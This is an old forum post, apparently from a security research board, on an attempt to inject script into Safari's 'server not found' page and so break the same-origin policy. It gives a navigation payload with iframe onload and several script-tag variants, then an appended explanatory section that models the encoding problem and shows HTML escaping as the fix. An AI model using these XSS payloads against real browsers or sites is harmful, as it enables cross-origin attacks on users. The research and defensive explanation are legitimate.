Safari SOP hangs by a thread...
Posted by: Gareth Heyes
Date: November 20, 2007 08:29AM

<script>
// Navigate to a URL whose host part carries the payload; the aim is for Safari's
// "server not found" page to reflect the host unescaped
self.location = 'http://xyz<iframe onload=alert(1)>';
</script>

This almost works and tries to XSS the Safari domain-not-found page. The only problem is that because it's passed within the URL, any spaces get URL-encoded, so I need a workaround that will inject the XSS even when URL encoding is used. Anyone have any ideas?

If it is possible to inject XSS (I'm not sure if it is) then the code is executed with local privileges and therefore SOP across domains can also be broken.

The following variants have also been tried but Safari doesn't allow incomplete script tags:-

//Injected but doesn't execute
<script>alert(1)
//Injected but doesn't execute
<script>alert(1)<script>
//The forward slash is removed so isn't injected
<script>alert(1)</script>
//Is injected in the google search box but the quote is escaped to &quot;
"><script>alert(1)<%2fscript>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]
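Added example, not code from the original post and not Safari's own error page: a small model of the failure mode the post describes. The "server not found" template, the escaping helper and the space-only encoding step are all hypothetical (the real Safari page and URL parser are not reproduced here; a current WHATWG URL parser rejects `<`, `>` and spaces in a host outright). The tag scanner only approximates one rule of a real HTML tokenizer: the tag name runs until whitespace, `/` or `>`, which is exactly why a `%20` in place of the space leaves `onload` glued to the tag name with no attribute to fire. The safe renderer shows what an error page that reflects the requested host should do with it.

```javascript
// Added example (not from the original post): why a percent-encoded space breaks
// the injected attribute, and how an error page should escape the reflected host.

// Constructed payload taken from the post: the host part of the URL carries HTML.
const RAW_PAYLOAD = 'xyz<iframe onload=alert(1)>';

// Hypothetical model of the behaviour described in the post: only spaces in the
// host get percent-encoded before the page reflects it. This is NOT a real
// browser URL parser.
function encodeSpacesOnly(host) {
  return host.replace(/ /g, '%20');
}

// Hypothetical "server not found" template that reflects the host verbatim
// (the vulnerable shape).
function renderUnsafe(host) {
  return `<p>Can't open the page because it can't find the server "${host}".</p>`;
}

// Minimal HTML escaping for text placed between tags or inside quoted attributes.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Same template, with the host escaped before it is placed into the markup.
function renderSafe(host) {
  return `<p>Can't open the page because it can't find the server "${escapeHtml(host)}".</p>`;
}

// Rough tag scanner. As in a real tokenizer, the tag name runs until whitespace,
// '/' or '>', so '<iframe%20onload=alert(1)>' is one long tag name with no
// attributes. Returns every on* attribute found, with its tag.
function findEventHandlers(html) {
  const found = [];
  const tagRe = /<([a-zA-Z][^\s/>]*)([^>]*)>/g;
  const attrRe = /([^\s=/]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s>]+))?/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const tag = m[1].toLowerCase();
    const attrs = m[2];
    attrRe.lastIndex = 0;
    let a;
    while ((a = attrRe.exec(attrs)) !== null) {
      const name = a[1].toLowerCase();
      if (name.startsWith('on')) found.push({ tag, attr: name });
    }
  }
  return found;
}

// Stand-alone demonstration.
console.log('raw host, unsafe page     :', findEventHandlers(renderUnsafe(RAW_PAYLOAD)));
console.log('%20 host, unsafe page     :', findEventHandlers(renderUnsafe(encodeSpacesOnly(RAW_PAYLOAD))));
console.log('raw host, escaped page    :', findEventHandlers(renderSafe(RAW_PAYLOAD)));
```

The second line of output is the post's problem in miniature: once the space is `%20`, the scanner (and a browser's tokenizer) sees no `onload` attribute at all. The third line is the fix on the rendering side: escaping the host before it lands in the page leaves nothing for the tokenizer to treat as a tag, whatever encoding the payload used.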
